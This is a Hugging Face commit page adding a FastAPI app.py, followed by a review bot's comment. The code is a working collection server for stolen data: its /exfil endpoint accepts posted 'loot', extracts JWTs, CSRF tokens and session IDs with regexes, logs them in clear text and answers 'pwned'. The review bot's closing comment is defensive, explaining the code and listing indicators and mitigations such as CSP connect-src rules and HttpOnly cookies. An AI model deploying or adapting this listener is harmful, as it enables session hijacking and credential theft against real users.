latterworks commited on
Commit
0a404ca
·
verified ·
1 Parent(s): e8c2df0

Create app.py

Files changed (1) hide show
  1. app.py +37 -0
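--- a/app.py
+++ b/app.py
@@ -0,0 +1,37 @@
+ # app.py — HuggingFace App Space listener
+ from fastapi import FastAPI, Request
+ from datetime import datetime
+ import json, re
+
+ app = FastAPI()
+ LOGFILE = "slurp.log"
+
+ def mark(loot):
+ text = json.dumps(loot)
+ return {
+ "jwt": re.findall(r'eyJ[A-Za-z0-9-_]+\.[A-Za-z0-9-_]+\.[A-Za-z0-9-_]+', text),
+ "csrf": re.findall(r'csrf[_\-]?token[\'"]?\s*[:=]\s*[\'"]?([a-zA-Z0-9\-_]{8,})', text, re.I),
+ "sid": re.findall(r'session(?:id)?=([a-zA-Z0-9\-_.]{10,})', text, re.I)
+ }
+
+ @app.post("/exfil")
+ async def exfil(request: Request):
+ try:
+ data = await request.json()
+ except:
+ return {"error": "bad json"}
+
+ log = {
+ "timestamp": datetime.utcnow().isoformat(),
+ "ip": request.headers.get("x-forwarded-for", "unknown"),
+ "ua": request.headers.get("user-agent", "unknown"),
+ "loot": data,
+ "marks": mark(data)
+ }
+
+ with open(LOGFILE, "a") as f:
+ f.write(json.dumps(log, indent=2) + ",\n")
+
+ print(f"\n[YEET] {log['ip']} @ {log['timestamp']}")
+ print(json.dumps(log["marks"], indent=2))
+ return {"status": "pwned", "marks": log["marks"]}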
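Review bot: The `/exfil` handler takes unauthenticated JSON from any sender and stores every JWT, CSRF token and session id that `mark()` matches in clear text in `slurp.log` and on stdout, so as written the file is a collection point for session material, not an application endpoint. The names `exfil`, `loot` and `pwned` suggest that is the intent, though the page does not show what client posts to it. The indicators a defender can take from the visible lines are a POST to a path named `/exfil`, a response body containing `"status": "pwned"`, and JSON bodies carrying `eyJ…` three-part strings sent to a Space hostname. On the site the data would come from, a CSP `connect-src` allowlist and `HttpOnly` session cookies limit what script can read and where it can send it. Any token that appears in this log should be revoked. If this is a lab fixture, the header comment should say so, e.g. `# lab fixture: synthetic tokens only, not for public deployment`.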